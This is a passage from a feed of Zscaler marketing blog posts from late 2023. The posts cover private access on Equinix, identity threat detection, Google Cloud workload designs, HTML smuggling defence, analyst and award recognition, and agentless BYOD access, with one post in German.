Service Edge (PSE) is a service that supports localized brokering in the same customer environment where private applications are hosted, such as colocation. The ZPA on-premises service enforces policies and stitches together the connection between an authorized user and a specific private application. When branch users or home office users are looking to access an application that is running in a private cloud, the connection between the user and the application is made with ZPA Private Service Edge, which is the shortest path to connectivity. ZPA PSE is now available on Equinix Network Edge. This integration enables customers to host ZPA service locally in the same environment where their private applications are hosted. The joint solution improves application performance by reducing latency. It reduces unnecessary hops that traffic would need to travel if the ZPA service was hosted in the public cloud. ZPA PSE service on Equinix Network Edge offers many benefits to customers, including: Delivering a superior user experience: Connecting users directly to private apps eliminates slow, costly backhauling over legacy VPNs while continuously monitoring and proactively resolving user-experience issues. Minimizing lateral movement: Applications are made invisible to the internet and unauthorized users, and IPs are never exposed using inside-out connections. Enforcing least-privileged access: Application access is determined by identity and context— not an IP address—and users are never put on the network for access. Stopping attacks with complete inspection: Private app traffic is inspected in line to prevent the most prevalent web attack techniques. Agility: Easily scale up or scale down resources, depending on usage. Cloud cost optimization: Run enterprise applications and ZPA services while optimizing overall cloud costs. Performance: Minimize the impact on application performance by eliminating the need to incur additional hops. Resilience: Ensure uninterrupted business continuity during blackouts, brownouts, and black swan events. Figure 1: Zscaler PSE on Equinix Network Edge ZPA Private Service Edge manages the connections between a Zscaler Client Connector for remote or branch users, a Zscaler Branch Connector for IoT/OT devices or servers, and the App Connector. ZPA Private Service Edge deploys as a lightweight virtual machine that is installed by customers within their own network environments. Once set up, ZPA Private Service Edge works in the same way as the ZPA cloud service. Notable use cases of the joint solution include: Connectivity Optimization: Fastest path of access for users. Disaster Recovery: Continued access to critical apps during a brownout, blackout and black swan event. Regulatory Compliance: Secure private access with zero trust architecture for regulatory purposes. Global Reachability: Extends Zscaler capabilities to more locations across the world. Zscaler and Equinix Collaboration Zscaler is a leader in cloud security with more than 40% Fortune 500 customers and 12+ years running a cloud service that sits in the data path with a proven scale of more than 320 billion transactions. Globally, Zscaler has more than 5,600 customers and a revenue exceeding $1.5 billion in global revenue in 2022. We’re combining these capabilities with Equinix, the world’s digital infrastructure company®, has the most dynamic global ecosystem of 10,000+ companies including 55%+ of the Fortune 500 customers and 460,000+ physical and virtual interconnections. Equinix is the world’s most expansive, secure, and sustainable data center platform with $7.2B+ of global revenue in 2022. Zscaler and Equinix have been collaborating for 12+ years to accelerate cloud transformation for customers. Through this partnership, customers get global coverage with data centers in 32 countries and coverage across six continents. Together, Zscaler and Equinix enable customers to have an optimized connectivity experience, so users can focus on enabling the business. ZPA Private Service Edge on Equinix Network Edge is offered today and is generally available. Please reach out to the Zscaler account team to request a demo. For more details on the solution, please visit: References: 1- Zscaler ThreatLabz 2023 Ransomware Report Mon, 11 Dez 2023 08:00:01 -0800 Karan Dagar Defend Against Ransomware & Identity-Based Attacks: Boost Your Cyber Defense with Zscaler ITDR™ Modern cyberattacks are diverse, use different tools and techniques, and target multiple points of entry. Ransomware is still one of the top threats organizations face today, and it’s only getting worse as threat actors continue to employ new techniques such as identity threats. Identity-based attacks are the driving force behind ransomware – as a single point of attack can now provide attackers with a potentially life-changing opportunity. Cyberattackers are now after your identities. Compromising identities Threats such as ransomware often use identity-based attack techniques. Identity attack techniques (such as lateral movement and compromising a valid credential) are typically used by the attacker to move quickly to a more lucrative target in the organization and evade prompt detection. Threat actors are targeting enterprise Active Directory (and Azure AD accounts) to gain a foothold in a target’s environment. Cybercriminals have a variety of methods to gain access to identities. A leaked or stolen password can often be used to break into databases with multiple credentials. In fact, passwords still account for 80% of all cyberattacks and are a growing concern among security professionals. Hackers often use automated scripts to try different stolen username and password combinations to take control of people’s accounts. When a user’s account gets compromised, they can fall victim to fraud, identity theft, unauthorized financial transactions, and other criminal activities. For instance, Kerberoasting is an identity attack technique used by cybercriminals to obtain valid Active Directory (AD) credentials. Kerberoasting attacks target AD service accounts because they often offer higher privileges and enable attackers to hide for extended periods of time. Kerberoast attacks are also notoriously hard to detect amid daily telemetry, making them even more attractive to cybercriminals. Password exposures are used by attackers to compromise databases and execute data exfiltration attacks on endpoints. Identity tools don’t detect these incidents and there’s no way for security teams to learn about a compromised credential or password exposure. Lateral Movement Fuels Cyberattacks Once an attacker gets their hands on a user or identity, all they have to do is hand over the credentials they’ve stolen to the identity provider that’s responsible for user authentication, and the lateral movement begins. That’s why lateral movement poses such a significant identity threat, as attackers have access to stolen user credentials, as well as the ability to pull credentials out of compromised machines which allow cybercriminals to log in to multiple machines in the same environment, distribute a ransomware payload, or encrypt multiple machines at once. The security teams lack visibility and there aren’t tools in their stack that can discover or alert all these incidents in an environment, which is alarming since the hacker legitimately compromises the AD. Attackers relentlessly seek to compromise service accounts, which often have high privileges, so that they can conduct lateral movement virtually undetected and thus access multiple machines and systems easily Sealing the Identity Gaps Identity compromise is the most common starting point for a breach, so identity threat detection is often the first alarm that goes off. Now, these crucial early indicators are made possible with Zscaler ITDRTM. Zscaler ITDR provides security teams with the visibility and protection they need for their identity management systems. You can detect identity-based attacks and be able to identify anomalous credential abuse, attempts at privilege escalation, and lateral movement. Reducing Risk with Actionable Insights, for Better Response Zscaler ITDR automatically surfaces hidden risks that might otherwise slip through the cracks, such as unmanaged identities, misconfigured settings, and even credential misuse. The solution offers organizations visibility and autonomous response capabilities, while also providing continuous assessment of AD misconfigurations, vulnerabilities, and active threats in real time and giving prescriptive guidance to close exposures and gaps in customer AD environments. Restrict or terminate those identities causing trouble and shut down threats before they have a chance to wreak havoc. You could also respond with capabilities such as tricking the attacker into misdirection and deception. For example, when a solution detects an identity-based attack, it can provide fake data that redirects and lures an attacker to a decoy using Zscaler Deception. Zscaler provides a deception environment of decoy systems and data mimicking production assets to misdirect attacks, engage attackers, and collect information on adversary tactics, techniques, and procedures (TTPs). Zscaler automatically isolates the compromised system conducting the identity-based attack from the rest of the environment, limiting interaction only with the decoy environment. Besides, Zscaler ITDR is integrated into the Zscaler Zero Trust Exchange which dynamically applies access policy controls to block compromised users when an identity attack is detected. This paralyzes the hacker from laterally moving across the systems and further checks the spread of ransomware. Conclusion While breaches are inevitable, and preventative security measures are not enough, Zscaler boosts your cyber defense stack against identity attacks. Zscaler ITDR delivers complete visibility in a single pane of glass and helps your security teams to detect and respond, in real time, to emerging identity threats in your cybersecurity environment including ransomware and sophisticated identity attacks. Read more about our ITDR technology here. Tue, 05 Dez 2023 08:49:16 -0800 Nagesh Swamy Demystifying Workload Security in Google Cloud Platform Deploying and configuring cloud workload security shouldn’t have to be so difficult. If you’re still working with the complex traditional way of deploying and managing legacy firewalls or VPNs in the cloud, it’s high time to move on and look at Zscaler Workload Communications. Zscaler Workloads Communications has now expanded its support to Google Cloud, one of the most widely adopted clouds, alongside AWS and Microsoft Azure. How it works Before we jump into design options for Workload Communications on Google Cloud, if you need a quick refresher on Zscaler Cloud Connector (VMs that facilitate secure egress traffic for cloud workloads and enable Workload Communications), you can read about it here. Workload Communications on Google Cloud Platform Let’s take a closer look at different Google Cloud networking design options as well as the pros and cons of each design. Google Cloud has an interesting feature called Shared VPC Architecture or Shared Project, which provides great flexibility for the Networking team to centralize cloud security management and control. Using Shared VPC Architecture, a developer can focus on the development side while the Networking team completely manages and controls networking. Using Shared VPC Architecture in Google Cloud is a recommended best practice. For more information, check out Shared VPC | Google Cloud. Google Cloud Provisioning Responsibilities Roles Responsibilities Shared Project (Host Project) Owned by the networking team and includes complete network constructs like Shared VPC, subnets, routing, and more. Cloud Connector instances are part of this project. Network resources in Shared Project are shared with Service Projects. For example, subnets are shared with different Service Projects. App Project (Service Project) Owned by the development team. Owners will use whatever network resources are shared by the Shared Project for deploying any instances in App Projects. Single Shared VPC Regional Cloud Connector Design This is based on a Single Shared VPC where: The workloads and Cloud Connectors are part of the same VPC but different Projects Cloud Connectors are part of a Shared Project in complete control of the Networking team Subnets from this shared VPC will be shared with Services projects for Developers to deploy any app VMs or serverless apps A VPC in GCP is a global construct that can span all supported regions. In most cases, if you want to avoid VPC peering and use plain Single Shared VPC for each environment (Prod, UAT, Dev, Pre-Prod, etc.), you can proceed with this design. By default, Google Cloud doesn’t allow subnet-to-subnet communication inside the same VPC. Therefore, even though the workloads and Cloud Connectors are part of the same VPC, you still have access control at the subnet level using Google Firewall, and you can span multiple regions with a single VPC as it's a global construct in GCP. Pros and cons of this design: Pros: Zscaler Cloud Connectors are deployed regionally—workloads can access the internet using regional Cloud Connectors along with regional load balancers. Provides a low-latency solution. Avoids cross-region traffic flows, optimizing customer costs. Plain vanilla design with Single Shared VPC per environment. Decentralized design improves fault tolerance. Enables grouping and sharing of Cloud Connector instances at the region level. Minimal VPCs or VPC peerings as workloads and Zscaler Cloud Connectors are part of the same VPC. Cons: Requires network tags for workloads to forward traffic to regional Cloud Connectors. Automation pipelines should be in place for tagging workloads. Requires strong IAM controls as Project-level network tags can be changed at any time by the Project owner or editor. Tag edits could impact the traffic flow for the specific instance. Single Shared VPC Centralized Cloud Connector Design This design is similar to the first, except Cloud Connectors are hosted in a centralized location, while workloads can be part of different regions. As a Single Shared VPC design with cross-regional access, it is mostly used in cases where workloads span multiple regions and you want to group geographically closer regions to send traffic through a centralized location. This helps avoid the need to deploy and manage Cloud Connectors in each region for geographically closer workloads. Pros and cons of this design: Pros: Easy to deploy, with no need for any network tags for workloads. Plain vanilla design with a Single Shared VPC per environment. Simple routing changes with two default routes: one for workloads without any network tags and another for CCs with tags pointing to internet GW. Cons: Cross-region traffic flow design. No low latency, no fault tolerance. Cross-regional traffic flow cost will need to be accounted for in this design. Cloud Connectors are deployed centrally in a single region. Multi-VPC Shared VPC Cloud Connector Design This is mainly for cases where you want VPC-level isolation for each Project in your organization. Because Google doesn’t support Transitive VPC architecture yet, this design requires you to configure Hub & Spoke VPC peering as well as peering between Workload VPCs. Once again, the VPCs are completely managed by the Networking team as part of the Shared Project ownership and shared this VPC’s with Spoke Projects along with Peering and routing. As part of routing, you just need to make sure to export/import the default route from the Hub VPC to Spoke VPCs. Pros and cons of this design: Pros: Easy to deploy, with no need for any network tags for workloads. Simple routing changes with two default routes: one for workloads without any network tags and another for CCs with tags pointing to internet GW. VPC level of isolation for each Project. Cons: VPC peering for Workload VPCs and Cloud Connector VPCs—Google has a limit on the number of VPC peerings, but doesn’t support Transitive Traffic, and thus requires VPC peering for any traffic flow. Complex routing changes depending on the traffic flow requirements. Conclusion Every design has pros and cons depending on your organization's requirements. Whichever design you choose, Zscaler Workload Communications provides the flexibility to secure it seamlessly, with complete automation support using Terraform. There’s no need for Trust/Untrust VPCs—Zscaler Cloud Connectors can be deployed as part of a Single Shared VPC shared across workloads or as part of an Isolated VPC as mentioned in the above designs. If your organization is looking for seamless multicloud security with unlimited scale for firewall, proxy, TLS decryption, DLP, and more, look no further than Zscaler Workload Communications. To learn more, visit our product page. You can also sign up for our self-guided hands-on lab. Fri, 01 Dez 2023 08:01:01 -0800 Siripuram Pavan Kumar Outsmart Evasive HTML Smuggling Attacks with AI-Powered Browser Isolation and Sandbox HTML smuggling is a highly evasive malware delivery technique that exploits legitimate HTML5 and JavaScript features to evade detection and deploy remote access trojans (RATs), banking malware and other malicious payloads. HTML smuggling bypasses traditional security controls like web proxy, email gateway, and legacy sandbox. These attacks are difficult to stop and are just one of many inventive ways in which threat actors compromise organizations daily. The Zscaler Zero Trust Exchange protects against these attacks with natively integrated prevention capabilities for zero-day protection. The Blueprint of HTML Smuggling Attackers are able to hide malicious HTML smuggling activity within seemingly harmless web traffic, making it difficult for legacy security tools to detect and block the attack. Source: Most modern advanced prevention layers do not protect against HTML smuggling attacks as those look for malware or files being transacted between the end user’s browser and the webpage. When a user accesses a web page intended to deliver an HTML smuggling attack, the content exchanged between the user’s browser and the webpage is an immutable blob containing binary data and JavaScript, not as a file. The JavaScript is executed on the user’s browser, and using the binary data in the immutable blob, the malicious file is constructed on the end user’s computer. As there is no file transferred over the wire, the attack goes unnoticed by the legacy sandbox and anti-malware engines. Zscaler Approach: Power of Platform As attackers continue to innovate with new and sophisticated threat vectors, organizations need to put in dynamic, integrated, layered security controls to stop threats that have never been seen before. The Zscaler Zero Trust Exchange has been built with this goal in mind, providing defense in depth against new and evasive techniques, including HTML smuggling, patient-zero malware, and more. Zscaler products such as AI-powered Browser Isolation, natively integrated with AI-powered Sandboxing and Advanced Threat Protection (ATP), thwart such attacks comprehensively. AI-powered Browser Isolation Browser Isolation stops web-based threats in their tracks. It isolates suspicious web pages in the Zero Trust Exchange and streams only the real-time, safe pixels of the sessions to the end user and not the active content. This keeps threats from reaching endpoints, thereby disrupting the kill chain of modern-day browser exploits. It creates an air gap between users and the web while keeping the user experience intact. Risky internet destinations, whether accessed directly or via email URLs, can be configured via policy to be fired up within Browser Isolation. AI-powered Smart Isolation enablement can accomplish that automatically. Thus, any malicious payload delivered via HTML smuggling from these risky destinations is restricted to the ephemeral container in the Zero Trust Exchange itself, thus protecting the endpoints. Together with AI-powered Sandbox and ATP For productivity reasons, it may be required that the Browser Isolation profile is configured to allow file downloads to the user’s endpoint. The user may try to download that malware to the endpoint out of curiosity. Even in that scenario, the unique Zscaler architecture with native integration of ATP and AI-powered Sandbox will prevent such malware from being downloaded to the endpoint. This dynamically generated malware could either have known signatures or be a patient-zero. Either way, users will be protected Known Malware Here are some examples of signatures (as seen in the Zscaler ThreatLabz Library) leveraged by ATP to block such malware. HTML.Downloader. SmugX (protected by Anti-Malware engine) JS.Dropper.GenericSmuggling (protected by Intrusion-Prevention Service) JS.MalURL.Duri (protected by Intrusion-Prevention Service) Patient-Zero Malware AI/ML-driven Zscaler’s Cloud Sandbox can stop unknown threats inline, preventing the patient-zero malware from being downloaded to the endpoint. Embark on the platform journey! In a nutshell, attacks like HTML smuggling, no matter how evasive they may be, cannot escape the Zscaler Zero Trust Exchange. That’s the power of the platform! Experience the One True Zero! Tech Tidbit - The Russian cybercriminal collective Nobelium – the group behind the SolarWinds attacks – is infamous for using HTML smuggling to deliver malware. Fri, 01 Dez 2023 08:00:02 -0800 Amit Jain The SSE Accolades Keep on Coming Secure Access Service Edge (SASE) has been grabbing many headlines in the IT world over the past few years, and for good reason. It helps organizations better support today’s flexible, location-agnostic working practices by combining various networking and security capabilities and providing a pathway to the adoption of zero trust principles. Although widely recognized as a goal to aim for, a number of organizations are choosing to start their journey with Security Service Edge (SSE), which is most simply described as SASE without the network re-architecting. SSE can sit on top of an existing network and immediately provide zero trust secure access to internet (SaaS) and private cloud applications. You can think of SSE as the fastest way to adopt zero trust with minimum disruption. Zscaler is a long-standing pioneer and leader in SSE, and today offers the largest, most mature, and scalable SSE platform on the market, with 150+ data centers worldwide processing (at the edge) more than 320 billion transactions, blocking 9 billion security incidents and policy violations every day. But don’t take our word for it. Industry research firms consistently recognize Zscaler as a leader in SSE, and three recent reports further extend our track record, demonstrating the power of our unique approach to zero trust. IDC calls out the reliability and performance of the Zscaler cloud¹ in the convergence of networking and security—Network Edge Security as a Service (NESaaS) Dell’Oro singles out Zscaler as the market share leader in SSE,² the security side of the secure access service edge (SASE) ISG points to Zscaler as a pioneer in the SSE market,³ focused on business risk and value as well as deep, context-led investigation These reports provide valuable insights into emerging trends, market predictions, key challenges facing today’s CISOs and enterprises, and much more. See for yourself with complimentary access to all three reports. 1. “IDC MarketScape: Worldwide Network Edge Security as a Service 2023 Vendor Assessment” By: Pete Finalle and Christopher Rodriguez, June 2023, IDC # US50723823 IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of ICT suppliers in a given market. The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each vendor’s position within a given market. The Capabilities score measures vendor product, go-to-market and business execution in the short-term. The Strategy score measures alignment of vendor strategies with customer requirements in a 3-5-year timeframe. Vendor market share is represented by the size of the circles. Vendor year-over-year growth rate relative to the given market is indicated by a plus, neutral or minus next to the vendor name. 2. “2021 & 2022 Market Share Leader Award for Security Service Edge (SSE)” Presented by: Dell’Oro Group, September 2023. 3. “ISG Provider Lens™ Quadrant: Cybersecurity – Solutions and Services | Security Service Edge (SSE)” by Information Services Group, LLC, June 2023. Thu, 30 Nov 2023 08:00:01 -0800 Simon Tompson Zscaler Data Protection named CRN’s “Product of the Year” in the Data Protection Category It’s time to pop the champagne! We are thrilled to announce that Zscaler has been honored with the prestigious CRN "Product of the Year" award for data protection in the subcategory of customer need. This recognition is a testament to our relentless pursuit of innovation and commitment to delivering best-in-class solutions for our customers and partner ecosystem. We couldn't be more excited to accept this award and share our excitement about Zscaler Data Protection with you. About the Award The CRN Products of the Year Awards acknowledge top IT products and services that showcase cutting-edge technology in the industry. These awards recognize innovative solutions that meet the evolving needs of the IT channel and its customers. For the 2023 edition, the CRN editorial team selected winners in 33 technology categories. To ensure a fair judgment, the finalists were evaluated by solution providers with real-world expertise, who scored them based on factors like technology, revenue, profit, and customer demand. So without further ado, let's jump into our favorite category—data protection—and how Zscaler was able to take home the prize in Data Protection for the sub category of Customer Need. Zscaler Data Protection Recognized a Winner CRN’s data protection award category covers a wide swath of concepts around data loss; from system failure and disaster recovery to cyberattacks and human error. It’s telling that Zscaler was called out in the subcategory of “Customer Need”. While system failure and disaster recovery are important to data hygiene, there’s nothing more top of mind and important to organizations than protecting data from malicious or accidental loss. Why did CRN and the channel community give Zscaler Data Protection the nod? Let's take a look: Zscaler Data Protection: Stopping Malicious Exfiltration One of the biggest challenges partners need to solve for their customers is the protection of distributed data. Data is the lifeblood of an organization, and keeping it safe is one of the main focus areas for CISOs and Security Architects. The challenge is most organizations' security architecture is not just designed for data protection in a cloud and mobile world. However, with Zscaler’s cloud-delivered approach to data protection, that all changes. As a purpose-built SSE cloud platform, Zscaler Data Protection is a core component of its architecture. Delivered from the cloud, all users, devices, and cloud apps are always routed through the Zscaler cloud. This ensures every transaction across an organization is always inspected and protected. This allows organizations to retire costly appliances and data center security in favor of a more agile, cost-effective cloud-delivered model. Because the Zscaler Zero Trust Exchange consolidates all security services into one platform, both Security, Data Protection, and Zero Trust Network Access, live in harmony. Centralized across the Zscaler platform, IT administrations get one central policy architecture that streamlines user, device, and cloud app protection. With Advanced Threat Protection, DLP, CASB, SWG, ZTNA, Firewall, Sandboxing, and Digital Experience Monitoring, organizations get everything they need to ensure threat actors can’t steal your data or put your or your users at risk. While stopping external threats is key, sadly, organizations need to ensure internal malicious activity is also kept in check. Users often take data to their next job, or engage in suspicious activity that hints at malicious activity. With Zscaler Endpoint DLP organizations can lock down devices so USB, network shares, and printing don’t pose a risk to data, while advanced UEBA helps quickly identify user behaviors that fall outside of norms - like bulk uploads or suspicious login activity Zscaler Data Protection: Preventing Accidental Data Loss Great data protection also requires looking at what sometimes is your biggest liability - your users. After all, they are the ones handling your data, and they often don’t have the best data protection habits - or just don’t know better. This is another area in which Zscaler Data Protection excels. Securing data from accidental loss starts with inline inspection. Built around an enterprise-grade DLP engine, Zscaler’s cloud-delivered platform enables organizations to ensure all data—across all connections and SSL—are inspected for data loss. Even BYOD connections become less risky, as Zscaler Browser Isolation enables you to stream data as pixels, thus ensuring the actual data doesn’t land on the unmanaged BYOD and walk away. Because Zscaler is delivered inline across the organization, shadow IT and cloud app control become a snap. You can quickly see all unsanctioned app activity and shut down cloud apps that are deemed too risky for your data. For sanctioned cloud apps that you own, Zscaler CASB provides full control over data residing in your platforms like Microsoft 365 or Google. IT teams can ensure risky data sharing by users is revoked, and leverage Zscaler’s security engines to quickly find and quarantine malware residing in your cloud apps. Lastly, Zscaler AppTotal and posture control enable you to scan your Cloud and SaaS Platforms for dangerous misconfigurations or third-party integrations and close these holes. As many of the largest data breaches have been due to misconfigurations, this is an important step in the data hygiene process Where do we go from here? Winning a CRN award in the category of Data Protection is truly a fantastic accolade, so we do want to thank CRN for their recognition. We also feel nothing speaks more loudly than the testimonials of our customers. To that end, if you’d like to hear what they have to say, you can hear about their successes here. We also thank the channel community for their continued support and commitment to Zscaler. It’s humbling to be part of such a strong movement to help companies along their digital transformation journey. We promise to continue to innovate and deliver impactful solutions that solve real customer problems. Lastly, if you’re currently a Zscaler partner, please visit our partner portal, where you can learn more about selling Zscaler Data Protection Mon, 04 Dez 2023 07:29:05 -0800 Steve Grossenbacher New to Zero Trust? Start Here Before joining Zscaler earlier this year I was a networking guy. In fact, my entire career in IT was in some way linked to computer networking, over a 25-year period, and I thought I knew all about security. I was steeped in a world that defined security in terms of firewalls, VPNs, Network Access Control, and Intrusion Detection and Prevention. There were a lot of boxes, and a ton of complexity to work through. All that effort makes you feel like you must be secure, right? Then I became a Zscaler employee. Suddenly my world was turned upside down. Rather than starting with the network, connecting people, and then attempting to lock everything down, I began to see another perspective altogether. Assume everything is insecure, remove all notion of implicit trust, and connect only what is permitted and secure. It was a revelation. It was also the beginning of a journey. As anyone else who has made a similar transition, or started their cybersecurity journey will attest, there is a LOT to learn in this space. A lot of technology, and a mountain of new jargon. Fortunately, there are plentiful resources, no shortage of training courses and many helpful folks ready to share what they know, but here’s the thing. Here’s the big question on the minds of many in this situation: Where do I start? There’s no such thing as flicking a switch to transition from the familiar concepts of security (those firewalls and VPNs) to a zero trust architecture. It really is best thought of as a journey— both mental and practical. And as the old saying goes, every journey begins with a first step. We want to provide that first step and make it easy for you to get started on this exciting journey because we recognize how badly the world needs more cybersecurity skills. We understand the burning need to transition to an architecture that’s purpose-built for a world where users and applications are anywhere and everywhere. So we built a webinar and named it ‘Start Here: An Introduction to Zero Trust.’ And because we know the scale of the cybersecurity skills gap around the world, we consider it important enough to run every month. We also want to provide a live experience, with an opportunity to keep the content fresh, and for our audience to ask questions in real time, so we’re doing that too. While there’s no way we can teach you all you need to know in one hour, we feel confident that you’ll find the hour you spent with us entertaining and informative. You’ll come away with a solid grasp of the basics so you can move on to more advanced topics, in line with your own goals. Look for the next episode on our webinars page, and book yourself a spot. If you can’t make it on the day, fear not. This one is like a regularly scheduled bus. It won’t be long before another one comes along, like I said, every month. We can’t wait to welcome you! Wed, 29 Nov 2023 08:00:01 -0800 Simon Tompson Der Idealfall wird zur Realität: So soll Zero Trust aussehen Im Laufe der letzten Jahre wurde immer deutlicher, dass der Status quo für Netzwerke und Sicherheit nicht länger tragbar ist. Die endlose Ausweitung von Hub-and-Spoke-Netzwerken auf immer mehr Remote-User, Zweigstellen und Cloud-Anwendungen erhöht das Risiko, beeinträchtigt die Anwendererfahrung und ist untragbar komplex und teuer. Dasselbe gilt, wenn man sich auf Sicherheitsmodelle nach dem Prinzip „Festung mit Burggraben“ verlässt, um das expandierende Netzwerk durch eine wachsende Anzahl von Sicherheitsappliances abzusichern. Zero Trust hat sich schnell als bevorzugte Lösung für die Probleme dieser perimeterbasierten Architekturen etabliert. Leider hat die Begeisterung über das Zero-Trust-Konzept zu Verwirrung bezüglich der konkreten Bedeutung dieses Begriffs geführt. Manchmal wird das Prinzip als eine bestimmte Funktion oder eine weitere Appliance (entweder Hardware oder virtuell) beschrieben. In anderen Fällen wird Zero Trust als der imaginäre heilige Gral der Sicherheitslösungen dargestellt – als Technologie, die in Wirklichkeit nicht existiert, die aber zumindest in der Theorie alle Probleme einer Organisation lösen könnte. Die Realität unterscheidet sich jedoch deutlich von diesen beiden Ansichten. Zero Trust ist eine Architektur. Es ist weder ein zusätzlicher Hebel, um den Status quo aufrechtzuerhalten, noch ein bloßes Hirngespinst, das auf einem Übermaß an Hoffnung und Naivität beruht. Zero Trust bedeutet eine Abkehr von Hub-and-Spoke-Netzwerken und Sicherheitsmodellen nach dem Prinzip „Festung mit Burggraben“. Deshalb kann es so effektiv die Probleme dieser beiden Konzepte vermeiden. Wenn Sie mehr über die Funktionsweise erfahren möchten, klicken Sie hier, um detailliertere Informationen zu erhalten. Sie können sich auch schnell die Funktionsweise veranschaulichen, indem Sie einen kurzen Blick auf das Diagramm unten werfen. Was den Abdeckungsbereich betrifft, sollte diese Architektur alles und jeden innerhalb einer Organisation absichern. Glücklicherweise ist diese umfassende Definition von Zero Trust nicht bloß hypothetisch gemeint. Das ideale Szenario ist real und Organisationen können schon heute davon profitieren. Lesen Sie weiter, um die vier Schlüsselbereiche kennenzulernen, die durch eine vollständige Zero-Trust-Architektur geschützt werden. Zero Trust für User Ihre User benötigen von überall aus schnellen, sicheren und zuverlässigen Zugriff auf Anwendungen und das Internet. Dies ist oft der erste Grund, warum Unternehmen eine Zero-Trust-Architektur einführen – damit User ihre Arbeit sicher und produktiv erledigen können, ohne durch die oben genannten Mängel perimeterbasierter Architekturen eingeschränkt zu sein. Vor allem aufgrund dieses Bedarfs hat Gartner den Begriff Security Service Edge (SSE) geprägt, um Sicherheitsplattformen zu beschreiben, die an der Edge bereitgestellt werden und Secure Web Gateway (SWG), Zero Trust Network Access (ZTNA), Cloud Access Security Broker (CASB), Digital Experience Monitoring (DEM) sowie andere Funktionalitäten bieten. Allerdings geht es bei Zero Trust (und auch bei SSE) um mehr als nur um die Absicherung von Usern. Zero Trust für Workloads Workloads müssen auch mit einer Zero-Trust-Architektur gesichert werden, wenn Organisationen Datenverlust und Infektionen durch Cyberbedrohungen verhindern wollen. Unter den Begriff Workload fallen alle Arten spezifischer Dienste (z. B. virtuelle Maschinen, Container, Microservices, Anwendungen, Speicher oder Cloud-Ressourcen), die entweder nach Bedarf oder ständig aktiv verwendet werden, um eine bestimmte Aufgabe zu erledigen; z. B. AWS S3. Genau wie Usern muss ihnen sicherer Zugriff auf Anwendungen und das Internet gewährt werden. Gleichzeitig müssen ihre Konfigurationen und Berechtigungen richtig eingestellt sein, um Probleme zu vermeiden, die zur Exposition von Daten führen können. Eine Zero-Trust-Architektur kann beide Herausforderungen bewältigen, indem sie die Workload-Kommunikation absichert und Funktionen wie Cloud Security Posture Management (CSPM) und Cloud Infrastructure Entitlement Management (CIEM) bereitstellt. Zero Trust für IoT und Betriebstechnologie „Internet of Things“ (IoT) und „Betriebstechnologie“ sind nicht nur leere Schlagworte. IoT-Geräte und Betriebstechnologie verändern die Arbeitsweise von Organisationen und sind schnell zu unverzichtbaren Assets geworden. Doch trotz ihrer Bedeutung und der Menge und Sensibilität der Daten, die sie sammeln können, sind sie nicht auf Sicherheit ausgerichtet. Daher müssen Organisationen diese Geräte in der gesamten Umgebung identifizieren, auf sichere Weise privilegierten Remotezugriff für sie gewähren und sicherstellen, dass den IoT- und Betriebstechnologiegeräten selbst sicherer Zugriff auf das Internet, auf Anwendungen und auf andere Geräte gewährt wird. Die Zero-Trust-Architektur wurde speziell mit Blick auf diese drei Anforderungen entwickelt. Zero Trust für B2B-Partner Interne Mitarbeiter sind nicht die einzigen User, die einen sicheren und leistungsfähigen Zugriff auf IT-Systeme benötigen. B2B-Lieferanten, Kunden und andere Partner haben ebenfalls legitimen Zugriffsbedarf. Das Verhindern dieses Zugriffs beeinträchtigt die Produktivität, aber das Gewähren übermäßiger Berechtigungen oder Netzwerkzugriffe öffnet Tür und Tor für Kompromittierung und die laterale Ausbreitung von Bedrohungen. Die Zero-Trust-Architektur umgeht diese beiden Probleme, indem sie das Prinzip der minimalen Rechtevergabe (PoLP) einhält und B2B-Partnern nur Zugriff auf die spezifischen Ressourcen gewährt, die sie benötigen. Browserbasierter Zugriff ohne Agents und Browser-Isolierung sind die Antworten auf die Herausforderung, Partnergeräte zu sichern, auf denen die Installation von Software nicht praktikabel ist. Die Zscaler Zero Trust Exchange ist die einzige echte Zero-Trust-Plattform (the One True Zero Trust). Sie bietet eine moderne Architektur, die umfassende Sicherheit für alle User, Workloads und IoT-/Betriebstechnologiegeräte sowie B2B-Partner bereitstellt. Mit Zscaler kann Ihre Organisation aus erster Hand erleben, dass das Zero-Trust-Ideal tatsächlich Realität ist. Um mehr zu erfahren, registrieren Sie sich für unser Webinar, das als Einführung in Zero Trust dient. Wed, 06 Dez 2023 08:00:02 -0800 Jacob Serpa Turbocharge Your BYOD or B2B Initiatives with Secure Agentless Experience Data breaches are on a tear, and continue to skyrocket. Their impact is huge, with hefty costs to organizations across all the major verticals. In deconstructing this rise in these data breaches, two key statistics jump out: 54% of organizational breaches occurred through B2B (business-to-business)/third-party access via external partners and contractors working on unmanaged devices. 71% of surveyed professionals leveraging BYOD (bring your own device), store sensitive work information on personal devices, and 43% of those devices have been targeted with work-related phishing attacks. Double-clicking on these stats provide a user-centric view. User-Centric View (requirements) Third-party users, like contractors who may work with multiple organizations, love their independence and want the freedom to be able to use the same (unmanaged) device to service multiple end clients. Similarly, remote or hybrid employees wish to be super productive on their own device, enjoying BYOD flexibility. To optimize experience for these users, the top requirement is to not install any specialized agents, and let the device be unmanaged. IT-Centric View (challenges) IT lacks control over unmanaged devices, creating business risks. So, enterprises need to prevent data exfiltration and protect applications while gaining full visibility. SaaS adoption can further complicate matters, taking control away from IT. Not to mention, typical access methods may break content (CASB reverse proxy) as well as restrict access to a limited set of SaaS apps. To support application access on unmanaged devices, organizations often use VDI (Virtual Desktop Infrastructure). Recently, the shortcomings of VDI have become clear—it doesn’t scale as it’s costly and complex while requiring an endpoint agent to install and manage. Moreover, increasingly the modernized applications are web or browser-based, and streaming an entire desktop via VDI doesn’t make for a very good end user experience. Introducing the Zscaler Approach: A Secure, Agentless Experience With Zscaler, end users authenticate into a portal for a dashboard view of their sanctioned SaaS and private web apps, without the need for an endpoint agent or forcing them to use anything but their favorite browser. This is because app access is provided through Zscaler Browser Isolation running under the hood, creating an isolated browser instance within an ephemeral cloud container that sends all traffic through the natively integrated policies and controls of the Zscaler Zero Trust Exchange. With this platform, users enjoy a managed device experience and security through whichever device they please. Zscaler Browser Isolation streams experience-optimized pixels back to the user’s device without sending the actual data, enforcing clipboard or read-only controls, restricting upload/download and print options, and providing watermarking etc. capabilities. Using file isolation capability and built-in document processing technology, users can view docs or share files (across apps, both SaaS and private, as per the policy) without having to download those to their unmanaged device. The integrated Zscaler DLP (Data Loss Prevention) suite provides comprehensive data protection, and all traffic goes through full inline inspection and security policy enforcement via the Zero 